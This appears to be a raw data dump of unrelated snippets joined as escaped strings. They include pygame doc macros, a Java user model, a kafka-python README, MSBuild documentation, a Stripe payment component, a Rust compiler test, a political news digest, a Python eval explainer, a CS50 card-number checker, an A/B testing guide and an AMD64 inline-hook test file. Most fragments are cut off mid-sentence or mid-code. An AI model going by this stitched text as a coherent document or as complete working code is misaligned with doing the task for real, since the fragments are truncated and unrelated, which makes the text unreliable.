DOC_PYGAMESDL2TOUCH \"pygame module to work with touch input\"\n#define DOC_PYGAMESDL2TOUCHGETNUMDEVICES \"get_num_devices() -> int\\nget the number of touch devices\"\n#define DOC_PYGAMESDL2TOUCHGETDEVICE \"get_device(index) -> touchid\\nget the a touch device id for a given index\"\n#define DOC_PYGAMESDL2TOUCHGETNUMFINGERS \"get_num_fingers(touchid) -> int\\nthe number of active fingers for a given touch device\"\n#define DOC_PYGAMESDL2TOUCHGETFINGER \"get_finger(touchid, index) -> int\\nget information about an active finger\"\n\n\n/* Docs in a comment... slightly easier to read. */\n\n/*\n\npygame._sdl2.touch\npygame module to work with touch input\n\npygame._sdl2.touch.get_num_devices\n get_num_devices() -> int\nget the number of touch devices\n\npygame._sdl2.touch.get_device\n get_device(index) -> touchid\nget the a touch device id for a given index\n\npygame._sdl2.touch.get_num_fingers\n get_num_fingers(touchid) -> int\nthe number of active fingers for a given touch device\n\npygame._sdl2.touch.get_finger\n get_finger(touchid, index) -> int\nget information about an active finger\n\n*/" +"package com.vpaliy.domain.model;\n\npublic class User {\n\n private String id;\n private String nickName;\n private String avatarUrl;\n private String fullName;\n private String description;\n private int followingCount;\n private int followersCount;\n private int playlistsCount;\n private int tracksCount;\n private int likedTracksCount;\n private boolean isFollowed;\n\n public String getDescription() {\n return description;\n }\n\n public int getFollowersCount() {\n return followersCount;\n }\n\n public int getFollowingCount() {\n return followingCount;\n }\n\n public int getPlaylistsCount() {\n return playlistsCount;\n }\n\n public int getTracksCount() {\n return tracksCount;\n }\n\n public String getAvatarUrl() {\n return avatarUrl;\n }\n\n public String getFullName() {\n return fullName;\n }\n\n public String getId() {\n return id;\n }\n\n public void setLikedTracksCount(int likedTracksCount) {\n this.likedTracksCount = likedTracksCount;\n }\n\n public boolean isFollowed() {\n return isFollowed;\n }\n\n public void setFollowed(boolean followed) {\n isFollowed = followed;\n }\n\n public int getLikedTracksCount() {\n return likedTracksCount;\n }\n\n public String getNickName() {\n return nickName;\n }\n\n public void setAvatarUrl(String avatarUrl) {\n this.avatarUrl = avatarUrl;\n }\n\n public void setDescription(String description) {\n this.description = description;\n }\n\n public void setFollowersCount(int followersCount) {\n this.followersCount = followersCount;\n }\n\n public void setFollowingCount(int followingCount) {\n this.followingCount = followingCount;\n }\n\n public void setFullName(String fullName) {\n this.fullName = fullName;\n }\n\n public void setId(String id) {\n this.id = id;\n }\n\n public void setNickName(String nickName) {\n this.nickName = nickName;\n }\n\n public void setPlaylistsCount(int" +"kafka-python\n============\n\nThis module provides low-level protocol support for Apache Kafka as well as\nhigh-level consumer and producer classes. Request batching is supported by the\nprotocol as well as broker-aware request routing. Gzip and Snappy compression\nis also supported for message sets.\n\nhttp://kafka.apache.org/\n\nOn Freenode IRC at #kafka-python, as well as #apache-kafka\n\nFor general discussion of kafka-client design and implementation (not python specific),\nsee https://groups.google.com/forum/m/#!forum/kafka-clients\n\nStatus\n------\n\nThe current stable version of this package is `0.9.3 <https://github.com/mumrah/kafka-python/releases/tag/v0.9.3>`_ and is compatible with:\n\nKafka broker versions\n\n* 0.8.2.0 [offset management currently ZK only -- does not support ConsumerCoordinator offset management APIs]\n* 0.8.1.1\n* 0.8.1\n* 0.8.0\n\nPython versions\n\n* 2.6 (tested on 2.6.9)\n* 2.7 (tested on 2.7.9)\n* 3.3 (tested on 3.3.5)\n* 3.4 (tested on 3.4.2)\n* pypy (tested on pypy 2.4.0 / python 2.7.8)\n\nLicense\n-------\n\nCopyright 2015, David Arthur under Apache License, v2.0. See `LICENSE <https://github.com/mumrah/kafka-python/blob/master/LICENSE>`_.\n\n\nContents\n--------\n\n.. toctree::\n :maxdepth: 2\n\n install\n tests\n usage\n API reference </apidoc/modules>\n\nIndices and tables\n==================\n\n* :ref:`genindex`\n* :ref:`modindex`\n* :ref:`search`" +"---\ntitle: \"Registering Extensions of the .NET Framework | Microsoft Docs\"\nms.date: 11/15/2016\nms.prod: \"visual-studio-dev14\"\nms.technology: msbuild\nms.topic: conceptual\nhelpviewer_keywords: \n - \"Add References dialog box, registering extensions of the .NET Framework\"\n - \"MSBuild, registering extensions of the .NET Framework\"\n - \".NET Framework extensions, registering\"\nms.assetid: deee6f53-ea87-4b88-a120-bea589822e03\ncaps.latest.revision: 8\nauthor: mikejo5000\nms.author: mikejo\nmanager: jillfra\n---\n# Registering Extensions of the .NET Framework\n[!INCLUDE[vs2017banner](../includes/vs2017banner.md)]\n\nYou can develop an assembly that extends a specific version of the .NET Framework. To enable the assembly to appear in the Visual Studio **Add References** dialog box, you must add the folder that contains it to the system registry. \n \n For example, assume that the Trey Research company has developed a library that extends the .NET Framework 4, and wants the library assemblies to appear in the **Add References** dialog box when a project targets the .NET Framework 4. Also assume that the assemblies are 32-bit assemblies running on a 32-bit computer or 64-bit assemblies running on a 64-bit computer, and that they will be installed in the C:\\TreyResearch\\Extensions4\\ folder. \n \n Register this folder by using this key: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\\\.NETFramework\\v4.0.21006\\AssemblyFoldersEx\\TreyResearch\\\\. Give the key this default value: C:\\TreyResearch\\Extensions4. \n \n> [!NOTE]\n> The build number of the .NET Framework version may" +"/*\n * This file is part of CoCalc: Copyright \u00a9 2020 Sagemath, Inc.\n * License: AGPLv3 s.t. \"Commons Clause\" \u2013 see LICENSE.md for details\n */\n\nimport {\n Button,\n ButtonToolbar,\n Row,\n Col,\n Well,\n} from \"../antd-bootstrap\";\n\nimport { Component, React, Rendered, redux } from \"../app-framework\";\n\nimport { ErrorDisplay, Loading } from \"../r_misc\";\n\nimport { HelpEmailLink } from \"../customize\";\n\nimport { powered_by_stripe } from \"./util\";\nimport { load_stripe, StripeCard } from \"./stripe\";\n\ninterface Props {\n on_close?: Function; // optionally called when this should be closed\n hide_cancel_button?: boolean;\n}\n\nconst CARD_STYLE = {\n margin: \"15px\",\n border: \"1px solid grey\",\n padding: \"30px\",\n background: \"white\",\n borderRadius: \"5px\",\n};\n\ninterface State {\n submitting: boolean;\n error: string;\n loading: boolean;\n}\n\nexport class AddPaymentMethod extends Component<Props, State> {\n private mounted: boolean = false;\n private card?: StripeCard;\n\n constructor(props, state) {\n super(props, state);\n this.state = {\n submitting: false,\n error: \"\",\n loading: true,\n };\n }\n\n public async componentDidMount(): Promise<void> {\n this.mounted = true;\n const stripe = await load_stripe();\n if (!this.mounted) return;\n this.setState({ loading: false });\n const elements = stripe.elements();\n this.card = elements.create(\"card\");\n if (this.card == null) throw Error(\"bug -- card cannot be null\");\n this.card.mount(\"#card-element\");\n }\n\n public componentWillUnmount(): void {\n this.mounted = false;\n }\n\n private async submit_payment_method(): Promise<void> {\n this.setState({ error: \"\"," +"var PlansMan = function() {\n this._features = {};\n this._configs = {};\n};\n\nPlansMan.prototype.defineFeature = function(feature, plans) {\n var self = this;\n self._features[feature] = self._features[feature] || {};\n if(_.isArray(plans)){\n plans.forEach(function (plan) {\n self._features[feature][plan] = true;\n });\n } else if(plans.all === true){\n self._features[feature][\"all\"] = true;\n } else if(_.isArray(plans.except)) {\n self._features[feature][\"except\"] = plans.except;\n } else {\n return false;\n }\n};\n\nPlansMan.prototype.setConfig = function(configName, configValues) {\n this._configs[configName] = configValues;\n};\n\nPlansMan.prototype.allowFeature = function(feature, plan) {\n var excepts = this._features[feature][\"except\"];\n var isAllowed = false;\n\n if(excepts){\n if(_.contains(excepts, plan)) {\n isAllowed = false;\n } else {\n isAllowed = true;\n }\n } else {\n isAllowed = !!this._features[feature][\"all\"]|| !!this._features[feature][plan];\n }\n\n return isAllowed;\n};\n\nPlansMan.prototype.getConfig = function(range, plan) {\n if(this._configs[range][\"all\"]){\n return this._configs[range][\"all\"]\n } else {\n return this._configs[range][plan];\n }\n};\n\nPlansManager = new PlansMan();" +"# Using Overmind with Angular\n\nTo use Overmind with Angular you just have to expose the **OvermindModule** and the instance of Overmind.\n\nLet us have a look at how you configure your app:\n\n```marksy\nh(Example, { name: \"guide/usingovermindwithangular/connect\" })\n```\n\nThe **service** is responsible for exposing the configuration of your application. The **\\*track** directive is what does the actual tracking. Just put it at the top of your template and whatever state you access will be optimally tracked. You can also select a namespace from your state to expose to the component:\n\n```marksy\nh(Example, { name: \"guide/usingovermindwithangular/connect_custom\" })\n```\n\nYou can now access the **admin** state and actions directly with **state** and **actions**.\n\n## NgZone\n\nSince Overmind knows when your components should update you can safely turn **ngZone** to `\"noop\"`. Note that other 3rd party libraries may not support this.\n\n\n## Rendering\n\nWhen you connect Overmind to your component and expose state you do not have to think about how much state you expose. The exact state that is being accessed in the template is the state that will be tracked. That means you can expose all the state of the application to all your components without worrying about performance." +" # The Complete Android App Development\n\n### In this course you will learn how to make 17 online games, and apps for Android, using Java. Enroll using a [ 95% discount coupon](https://www.udemy.com/course/android-tutorial-for-beginners/?referralCode=BC559D7466CF58A9CC48). \n\nBellow, list of open source Apps that we build in tutorial\n\n- [Find My Age App](#).\n- [Tic Tac Toe Local App](#).\n- [Calculator App](#).\n- [Pok\u00e9mon Game App](#).\n- [Zoo App](#).\n- [Restaurants App](#).\n- [Find Sunrise time App](#).\n- [My Notes App](#).\n- [Tic Tac Toe using Firebase App](#).\n- [Facebook App using Firebase](#).\n- [MediaPlayer App](#).\n- [Alaram App](#).\n- [Notification Channel App](#).\n- [Light sensor App](#).\n- [Nimbuzz vibrate](#).\n- [Find My Phone App](#).\n- [Twitter App using Php + MySQL](#).\n\n\n\n\n![main](http://attach.alruabye.net/androidTutorialForBeginners/androidTutorialForBeginners.jpg)\n \n \n This\u00a0source will help the beginners to start build their own Android \u00a0apps \u00a0from scratch. By the end of this course\u00a0you will be able to build real world android apps. In this\u00a0course you will learn how to build and design secure\u00a0android apps avoiding Android\u00a0Vulnerabilities, and how to work with android layout tools to design very attractive and responsive\u00a0layout that work with different device size, then you will learn how to use Sqlite as local database storage \u00a0and" +"package com.alibaba.rsocket.util;\n\nimport io.netty.buffer.ByteBuf;\nimport io.netty.buffer.Unpooled;\n\nimport java.nio.charset.StandardCharsets;\nimport java.util.Date;\n\n/**\n * Byte buf builder\n *\n * @author leijuan\n */\npublic class ByteBufBuilder {\n ByteBuf buf = Unpooled.buffer();\n\n public static ByteBufBuilder builder() {\n return new ByteBufBuilder();\n }\n\n public ByteBufBuilder value(byte value) {\n buf.writeByte(value);\n return this;\n }\n\n public ByteBufBuilder value(int value) {\n buf.writeInt(value);\n return this;\n }\n\n public ByteBufBuilder value(long value) {\n buf.writeLong(value);\n return this;\n }\n\n public ByteBufBuilder value(double value) {\n buf.writeDouble(value);\n return this;\n }\n\n public ByteBufBuilder value(boolean value) {\n buf.writeByte(value ? 1 : 0);\n return this;\n }\n\n public ByteBufBuilder value(byte[] value) {\n buf.writeInt(value.length);\n buf.writeBytes(value);\n return this;\n }\n\n public ByteBufBuilder value(ByteBuf value) {\n buf.writeInt(value.readableBytes());\n buf.writeBytes(value);\n return this;\n }\n\n public ByteBufBuilder value(String value) {\n if (value == null || value.isEmpty()) {\n buf.writeInt(0);\n } else {\n byte[] bytes = value.getBytes(StandardCharsets.UTF_8);\n buf.writeInt(bytes.length);\n buf.writeBytes(bytes);\n }\n return this;\n }\n\n public ByteBufBuilder value(Date value) {\n buf.writeLong(value.getTime());\n return this;\n }\n\n public ByteBuf build() {\n return this.buf;\n }\n\n}" +"Revolver Cartridges\n\nCartridges are created in the Engineer's Workbench, by the use of specific <link;blueprints;Engineer's Blueprints>. Blueprints for normal ammunition you can create yourself, but some more advanced types will require you to buy adequate blueprints from someone else.<np>\n<&empty>\u00a7lEmpty \u00a7lCasings\u00a7r and \u00a7lShells\u00a7r are the basis for every projectile. Empty Casings can also be crafted in the <link;metal_press;Metal Press>, using the appropriate mold, at a greatly reduced cost.<np>\n<&casull>\u00a7lCasull \u00a7lCartridges\u00a7r are created with a \"Common Projectiles\" blueprint. They are a simple lead projectile inflicting medium damage.<np>\n<&ap>\u00a7lArmor-Piercing \u00a7lCartridges\u00a7r are created with the same blueprint. They do the same amount of damage but penetrate armor by sheer kinetic force.<np>\n<&buckshot>\u00a7lBuckshot \u00a7lCartridges\u00a7r, created with the aformentioned blueprint, are filled with multiple small projectiles that are fired out in a cone shape. This cartridge is highly effective at short range.<np>\n<&he>\u00a7lHigh-Explosive \u00a7lCartridges\u00a7r are created with a \"Common Projectiles\" blueprint. They fire a projectile that explodes on impact, causing damage to living creatures and terrain.<np>\n<&silver>\u00a7lSilver \u00a7lCartridges\u00a7r, also created with a \"Common Projectiles\" blueprint, consist of a lead core wrapped in silver, making them highly effective against undead.<np>\n<&dragon>\u00a7lDragon's \u00a7lBreath Cartridges\u00a7r are created with a \"Specialized Projectiles\" blueprint. Similarly to Buckshot, they are effective" +"// check-pass\n// Check tautalogically false `Copy` bounds\n#![feature(trivial_bounds)]\n\nfn copy_string(t: String) -> String where String: Copy { //~ WARNING trivial_bounds\n is_copy(&t);\n let x = t;\n drop(t);\n t\n}\n\nfn copy_out_string(t: &String) -> String where String: Copy { //~ WARNING trivial_bounds\n *t\n}\n\nfn copy_string_with_param<T>(x: String) where String: Copy { //~ WARNING trivial_bounds\n let y = x;\n let z = x;\n}\n\n// Check that no reborrowing occurs\nfn copy_mut<'a>(t: &&'a mut i32) -> &'a mut i32 where for<'b> &'b mut i32: Copy {\n //~^ WARNING trivial_bounds\n is_copy(t);\n let x = *t;\n drop(x);\n x\n}\n\nfn is_copy<T: Copy>(t: &T) {}\n\n\nfn main() {}" +"---\ntitle: 'Day 421: 100% safe.'\ndate: 2018-03-16 15:43:00 -07:00\nfile: \"/uploads/Day-421.mp3\"\npost: Day 421\nduration: '00:03:46'\nlength: 4567303\n---\n\n**Friday, March 16, 2018**\n\n**Subscribe:** [Get the Daily Update in your inbox for free.](https://whatthefuckjusthappenedtoday.com/subscribe/)\n\n1/ Trump plans to remove national security adviser H.R. McMaster and is currently considering potential replacements.\n\n2/ Trump is on track to hire multiple cable news personalities to fill out his cabinet.\n\n3/ John Kelly, whose departure has been rumored to be imminent, has settled on a temporary truce with Trump.\n\n4/ Stormy Daniels was threatened with \"physical harm\" in response to her claims that she had an affair with Trump in 2006.\n\n**NOTABLES.**\n\n* Ivanka Trump will meet with South Korean Foreign Minister Kang Kyung-wha.\n\n* Vanessa Trump filed for divorce from Trump Jr.\n\n* All seven U.S. troops aboard a military helicopter that crashed in western Iraq on Thursday are dead.\n\n* Rep. Louise Slaughter died Friday at age 88, while serving her 16th term in the House of Representatives.\n\n* The 5th Circuit Court of Appeals tossed out a rule that required financial advisers to act in the best interest of their clients.\n\n* A resolution denouncing white nationalists and neo-Nazis died in" +".. _configuration.layers.parameterfilters:\n\nParameter Filters\n=================\n\nParameter filters provide templates for extracting arbitrary parameters from requests. This allows using GeoWebCache in scenarios such as time series data, multiple styles for the same layer or with CQL filters set by the client.\n\nThere are four types of parameter filters:\n\n#. **String filters** (``<stringParameterFilter>``)\n#. **Floating point number filters** (``<floatParameterFilter>``)\n#. **Integer filters** (``<integerParameterFilter>``)\n#. **Regular expression filters** (``<regexParameterFilter>``)\n\nA given layer can have multiple types of parameter filters.\n\nIf a request does not comply with the allowed values of the set parameter, the request will fail, usually with an error such as::\n\n 400: <value> violates filter for parameter <key>\n\nString filter\n-------------\n\nGeoWebCache can also use an allowable list of string values in a parameter filter for a given key. If the string in the request matches one of the string specified in the parameter filter, the request will proceed.\n\nWhen specifying a string filter, three pieces of information are required:\n\n* **Key** (``<key>``). The key is not case sensitive.\n* **Default value** (``<defaultValue>``).\n* **List of strings** (``<values>``, ``<string>``). The strings are case sensitive.\n\nThis information is presented in the following schema inside the ``<wmsLayer>`` tag:\n\n.. code-block:: xml\n\n <parameterFilters>\n <stringParameterFilter>" +"package org.openscience.cdk.fingerprint;\n\n\nimport java.io.BufferedReader;\nimport java.io.InputStream;\nimport java.io.InputStreamReader;\nimport java.util.ArrayList;\nimport java.util.List;\n\n/**\n * Default sets of atom containers aimed for use with the substructure.\n *\n * @author egonw\n *\n * @cdk.module fingerprint\n * @cdk.githash\n */\npublic class StandardSubstructureSets {\n /**\n * The functional groups.\n *\n * @return A set of the functional groups.\n * @throws Exception if there is an error parsing SMILES for the functional groups\n */\n public static String[] getFunctionalGroupSMARTS() throws Exception {\n return readSMARTSPattern(\"org/openscience/cdk/fingerprint/data/SMARTS_InteLigand.txt\");\n }\n\n /**\n * Subset of the MACCS fingerprint definitions. The subset encompasses the pattern\n * that are countable:\n * <ul>\n * <li>Patterns have obvious counting nature, <i>e.g., 6-Ring, C=O, etc.</i></li>\n * <li>Patterns like <i>\"Is there at least 1 of this and that?\", \"Are there at least 2 ...\"</i> etc. are merged</li>\n * <li>Patterns clearly corresponding to binary properties, <i>e.g., actinide group ([Ac,Th,Pa,...]), isotope, etc.,</i> have been removed.</li>\n * </ul>\n *\n *\n * @return Countable subset of the MACCS fingerprint definition\n * @throws Exception if there is an error parsing SMILES patterns\n */\n public static String[] getCountableMACCSSMARTS() throws Exception {\n return readSMARTSPattern(\"org/openscience/cdk/fingerprint/data/SMARTS_countable_MACCS_keys.txt\");\n }\n\n /**\n * Load a list of SMARTS patterns from the specified file.\n *\n * Each line in the file corresponds" +"/* SPDX-License-Identifier: GPL-2.0 */\n/*\n * Copyright (C) Microsoft Corporation\n */\n\n#ifndef __TPM2_FTPM_TEE_H__\n#define __TPM2_FTPM_TEE_H__\n\n/* This UUID is generated with uuidgen */\n#define TA_FTPM_UUID { 0xBC50D971, 0xD4C9, 0x42C4, \\\n\t{0x82, 0xCB, 0x34, 0x3F, 0xB7, 0xF3, 0x78, 0x96} }\n\n/* The TAFs ID implemented in this TA */\n#define FTPM_OPTEE_TA_SUBMIT_COMMAND (0)\n#define FTPM_OPTEE_TA_EMULATE_PPI (1)\n\n/* max. buffer size supported by fTPM */\n#define MAX_COMMAND_SIZE 4096\n#define MAX_RESPONSE_SIZE 4096\n\n/**\n * struct ftpm_tee_private - fTPM's private context\n * @tee_dev: struct udevice for TEE.\n * @session: fTPM TA session identifier.\n * @is_open: Indicates whether the driver is already opened by client or not.\n * @shm: Memory pool shared with fTPM TA in TEE.\n */\nstruct ftpm_tee_private {\n\tstruct udevice *tee_dev;\n\tu32 session;\n\tint is_open;\n\tstruct tee_shm *shm;\n};\n\n#endif /* __TPM2_FTPM_TEE_H__ */" +"---\nauthor: stefkn\n\nlevels:\n\n - beginner\n\n - basic\n\n - medium\n\ntype: normal\n\ncategory: must-know\n\nlinks:\n\n - '[Python eval()](https://www.programiz.com/python-programming/methods/built-in/eval)'\n - '[Eval really is dangerous](https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html)'\n\n---\n# The `eval` Built-in Function\n\n---\n## Content\n\nThe `eval` built-in allows a Python program to evaluate a string of Python code within the program. The code to be executed is passed as an argument to `eval`. The function takes the general syntax:\n\n```python\neval(expression, globals=None, locals=None)\n```\n\nThe three parameters are:\n\n - __expression__ - the Python code to be evaluated, as a string. This is mandatory.\n - __globals__ - a dictionary, used to determine which global variables the code in the expression can access. This is optional.\n - __locals__ - a mapping object, also usually a dictionary, used to determine which local variables the code in the expression can access. This is optional.\n\nIf no global or local parameters are passed to `eval`, the expression is evaluated in the current scope, which means it has access to the same local and global variables as a line of code executed on the same line.[1] If no local dictionary is provided, `eval` reverts to using the global dictionary as the local one as well. If an empty" +"Germany's Dresdner Bank and Dutch bank ABN AMRO Holding NV may covet a larger slice of lucrative British fund management business, but analysts warned on Wednesday their shopping lists will be limited.\n\"Some of the smaller quoted firms might get snapped up,\" one banking analyst told Reuters, adding the price range for quoted asset management companies varied from between around 125 million pounds ($207.6 million) to several billion pounds.\n\"There's a large range of value out there, but nothing is on offer,\" he said.\nWell-known top performers such as Mercury Asset Management (MAM) are likely to be prohibitively expensive and none of the major players have indicated they are up for grabs.\nAnd the weaker fund firms are not likely to be of such great interest to European banks trying to make an immediate impact on the market rather than turn around a non-performer.\n\"There's an active trading market for these businesses but some banks feel the prices are too high,\" John Leonard, banking analyst at Salomon Brothers said.\nBanks are not alone in their desire to grab more asset management business, with insurance companies also in the frame. And as with other areas of financial services completely new entrants" +"\ufeffusing System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\nusing System.Threading.Tasks;\n\nnamespace HearthstoneAI.State\n{\n enum GameStage\n {\n STAGE_UNKNOWN,\n STAGE_GAME_FLOW,\n STAGE_PLAYER_MULLIGAN,\n STAGE_OPPONENT_MULLIGAN,\n STAGE_PLAYER_CHOICE,\n STAGE_OPPONENT_CHOICE\n }\n\n class GameStageHelper\n {\n static public GameStage GetGameStage(Game game)\n {\n ReadOnlyEntity game_entity;\n if (!game.TryGetGameEntity(out game_entity)) return GameStage.STAGE_UNKNOWN;\n\n ReadOnlyEntity player_entity;\n if (!game.TryGetPlayerEntity(out player_entity)) return GameStage.STAGE_UNKNOWN;\n\n ReadOnlyEntity opponent_entity;\n if (!game.TryGetOpponentEntity(out opponent_entity)) return GameStage.STAGE_UNKNOWN;\n\n if (player_entity.GetTagOrDefault(GameTag.MULLIGAN_STATE, (int)TAG_MULLIGAN.INVALID) == (int)TAG_MULLIGAN.INPUT)\n {\n return GameStage.STAGE_PLAYER_MULLIGAN;\n }\n\n if (opponent_entity.GetTagOrDefault(GameTag.MULLIGAN_STATE, (int)TAG_MULLIGAN.INVALID) == (int)TAG_MULLIGAN.INPUT)\n {\n return GameStage.STAGE_OPPONENT_MULLIGAN;\n }\n\n if (!game_entity.HasTag(GameTag.STEP)) return GameStage.STAGE_UNKNOWN;\n\n TAG_STEP game_entity_step = (TAG_STEP)game_entity.GetTag(GameTag.STEP);\n if (game_entity_step != TAG_STEP.MAIN_ACTION) return GameStage.STAGE_GAME_FLOW;\n\n if (player_entity.GetTagOrDefault(GameTag.CURRENT_PLAYER, 0) == 1) return GameStage.STAGE_PLAYER_CHOICE;\n if (opponent_entity.GetTagOrDefault(GameTag.CURRENT_PLAYER, 0) == 1) return GameStage.STAGE_OPPONENT_CHOICE;\n return GameStage.STAGE_UNKNOWN;\n }\n }\n}" +"---\n3ip: 9\ntitle: Ghost Threads: Ephemeral Threads on 3box\nauthor: Ghilia Weldesselasie @ghiliweld\ndiscussions-to: https://github.com/3box/3box/issues/675\nstatus: Draft\ncreated: 2019-08-17\nrequires: 3IP 1\n---\n\n## Simple Summary\nEphemeral messages on 3box, for when we don't want messages to persist (like in Persistent Threads).\n\n## Abstract\nCurrently 3Box supports building chat like system though the threads api. However, for building things like trollboxes, or online lists, etc. threads are not the best fit. Ipfs has a feature called pubsub, which is a system for passing messages between peers. Pubsub can be used to create an ephemeral chat system where messages are not persisted anywhere in the network, rather they are just sent across once and seen by anyone online at that point. \n\n## Motivation\nOne could create Threads and delete message we don't want persisted, but if we already know we don't want to persist any messages in a chat it makes more sense to simply use pubsub and not save messages from the get-go. Which is why we're working on this new standard for ephemeral messaging.\n\n## Specification\n\n### Room Discovery\n\nEach pubsub room on ipfs has a name that serves as a topic between peers. To distinguish between different" +"from cs50 import get_int\nfrom math import floor\n\n\ndef main():\n digit1 = 0\n digit2 = 0\n num_digits = 0\n sum_of_double_odds = 0\n sum_of_evens = 0\n cc_number = get_int(\"Number: \")\n\n while cc_number > 0:\n digit2 = digit1\n digit1 = cc_number % 10\n\n if num_digits % 2 == 0:\n sum_of_evens += digit1\n else:\n multiple = 2 * digit1\n sum_of_double_odds += (multiple // 10) + (multiple % 10)\n\n cc_number //= 10\n num_digits += 1\n\n is_valid = (sum_of_evens + sum_of_double_odds) % 10 == 0\n first_two_digits = (digit1 * 10) + digit2\n\n if digit1 == 4 and num_digits >= 13 and num_digits <= 16 and is_valid:\n print(\"VISA\\n\")\n elif first_two_digits >= 51 and first_two_digits <= 55 and num_digits == 16 and is_valid:\n print(\"MASTERCARD\\n\")\n elif (first_two_digits == 34 or first_two_digits == 37) and num_digits == 15 and is_valid:\n print(\"AMEX\\n\")\n else:\n print(\"INVALID\\n\")\n\n\nif __name__ == \"__main__\":\n main()" +"/*\n * make -- maintain program groups\n * td 80.09.17\n * things done:\n *\t20-Oct-82\tMade nextc properly translate \"\\\\\\n[ \t]*\" to ' '.\n *\t15-Jan-85\tMade portable enough for z-8000, readable enough for\n *\t\t\thuman beings.\n *\t06-Nov-85\tAdded free(t) to make() to free used space.\n *\t07-Nov-85\tModified docmd() to call varexp() only if 'cmd'\n *\t\t\tactually contains macros, for efficiency.\n *\t24-Feb-86\tMinor fixes by rec to many things. Deferred\n *\t\t\tmacro expansion in actions until needed, deferred\n *\t\t\tgetmdate() until needed, added canonicalization in\n *\t\t\tarchive searches, allowed ${NAME} in actions for\n *\t\t\tshell to expand, put macro definitions in malloc,\n *\t\t\tentered environ into macros.\n *\t17-Oct-86\tVery minor MS-DOS changes by steve: add _cmdname[],\n *\t\t\tconditionalize archive code as #if COHERENT || GEMDOS.\n *\t 8-Dec-86\tRec makes inpath() search current directory first,\n *\t\t\tand allows : in dependency list under MSDOS && GEMDOS.\n *\t 8-Feb-91\tsteve: fix comment handling, allow \"\\#\", allow ${VAR}.\n *\t\t\tAdd docmd0() to make $< and $* work in Makefiles.\n *\t12-Feb-91\tsteve: add $SRCPATH source path searching.\n *\t 1-Nov-91\tsteve: fix bug in nextc() to handle \"\\n\\t\\n\" correctly\n * 29-Sep-92\tmichael: fix problem with defining a rule that also" +"using System;\nusing System.Collections.Generic;\nusing System.Text;\nusing System.Diagnostics;\nusing System.IO;\n\nnamespace MonoTorrent\n{\n /// <summary>\n /// Keeps track of the X most recent number of events recorded by the listener. X is specified in the constructor\n /// </summary>\n public class Top10Listener : TraceListener\n {\n private int capacity;\n private LinkedList<string> traces;\n\n public Top10Listener(int capacity)\n {\n this.capacity = capacity;\n this.traces = new LinkedList<string>();\n }\n\n public override void Write(string message)\n {\n lock (traces)\n traces.Last.Value += message;\n }\n\n public override void WriteLine(string message)\n {\n lock (traces)\n {\n if (traces.Count >= capacity)\n traces.RemoveFirst();\n\n traces.AddLast(message);\n }\n }\n\n public void ExportTo(TextWriter output)\n {\n lock (traces)\n foreach (string s in this.traces)\n output.WriteLine(s);\n }\n }\n}" +"#pragma once\n\nclass LineSegment;\nclass PuresoftRasterizer\n{\npublic:\n\ttypedef struct\n\t{\n\t\tfloat x, y;\n\t} VERTEX2F;\n\n\ttypedef struct\n\t{\n\t\tint left;\n\t\tint leftClamped;\n\t\tint leftVerts[2]; // indices of verts for left point\n\t\tint right;\n\t\tint rightClamped;\n\t\tint rightVerts[2]; // indices of verts for right point\n\t} RESULT_ROW;\n\n\ttypedef struct\n\t{\n\t\tVERTEX2F vertices[3];\n\t\tint firstRow;\n\t\tint lastRow;\n\t\tRESULT_ROW* m_rows;\n\t} RESULT;\n\npublic:\n\tPuresoftRasterizer(void);\n\t~PuresoftRasterizer(void);\n\n\tconst RESULT* initialize(int width, int height);\n\tbool pushTriangle(const float* vert0, const float* vert1, const float* vert2);\n\nprivate:\n\tint m_width;\n\tint m_height;\n\tint m_halfWidth;\n\tint m_halfHeight;\n\tint m_resultCapacity;\n\tRESULT m_output;\n\n\tinline void pushVertex(int idx, const float* vert);\n\tinline void processTriangle(const LineSegment& edgeL, const LineSegment& edgeR, float yMin, float yMax);\n\tinline void processStandingTriangle(const VERTEX2F* verts, int top, int bottom, int third);\n};" +"11\n1000 1 1 1 1 1 1 1 1 1 1\n10\n715 1 0 0 0 0 0 0 0 0 0 4\n650 0 1 0 0 0 0 0 0 0 0 12\n625 0 0 1 0 0 0 0 0 0 0 8\n553 0 0 0 1 0 0 0 0 0 0 10\n514 0 0 0 0 1 0 0 0 0 0 10\n508 0 0 0 0 0 1 0 0 0 0 15\n359 0 0 0 0 0 0 1 0 0 0 17\n348 0 0 0 0 0 0 0 1 0 0 7\n290 0 0 0 0 0 0 0 0 1 0 10\n182 0 0 0 0 0 0 0 0 0 1 7" +"---\nlayout: page\ntitle: A/B Testing\n---\n\n<div id=\"toc\">\n# \"True or False\":#tf\n# \"Interpreting the Results\":#interpret\n# \"Multiple Alternatives\":#multiple\n# \"A/B Testing and Code Testing\":#test\n# \"Let the Experiment Decide\":#decide\n</div>\n\n\n\"A/B testing\":http://en.wikipedia.org/wiki/A/B_testing (or \"split testing\") are experiments you can run to compare the performance of different alternatives. A classical example is using an A/B test to compare two versions of a landing page, to find out which alternative leads to more registrations.\n\nYou can use A/B tests to gauge interest in a new feature, response to a feature change, improve the site's design and copy, and so forth. In spite of the name, you can use A/B tests to check out more than two alternatives.\n\nbq. \"If you are not embarrassed by the first version of your product, you\u2019ve launched too late\" -- Reid Hoffman, founder of LinkedIn\n\n\nh3(#tf). True or False\n\nLet's start with a simple experiment. We have this idea that a bigger sign-up link will increase the number of people who sign up for our service. Let's see how well our hypothesis holds.\n\nWe already have a \"metric\":metrics.html we're monitoring, and our experiment will measure against it:\n\n<pre>\nab_test \"Big signup link\" do\n description \"Testing" +" ;; Test file for AMD64 inline hooks.\n[BITS 64]\ndefault rel\n\n%macro HookTestCase 2\n db '---', 10\n db 'arch: AMD64', 10\n db 'name: ' ; The name of the test case.\n db %2, 10\n db '...', 10\n db '<bin>'\ntest%1:\n%endmacro\n\n%macro EndHookTestCase 0\n nop\n nop\n nop\n nop\n db '</bin>', 10\n nop\n nop\n nop\n nop\n%endmacro\n\n\nsection .text:\nstart:\n ;; The Start of the .text section is mapped at offset 0.\n ;; We mark it so it can be easily found by the profile\n ;; generation script.\n ;; Pad here by exactly 0x100 chars to ensure that __target__ is at\n ;; offset 0x100.\n db '__start__ '\n db ' '\n db ' '\n db ' '\n\ntarget:\n db '__target__'\n ;; The target for all the jumps.\n ret\n\ntemp: dq 0\n\n ;; Following are test cases for hooks.\n HookTestCase ImmediateJump, \"ImmediateJump\"\n jmp target\n EndHookTestCase\n\n HookTestCase IndirectJump, 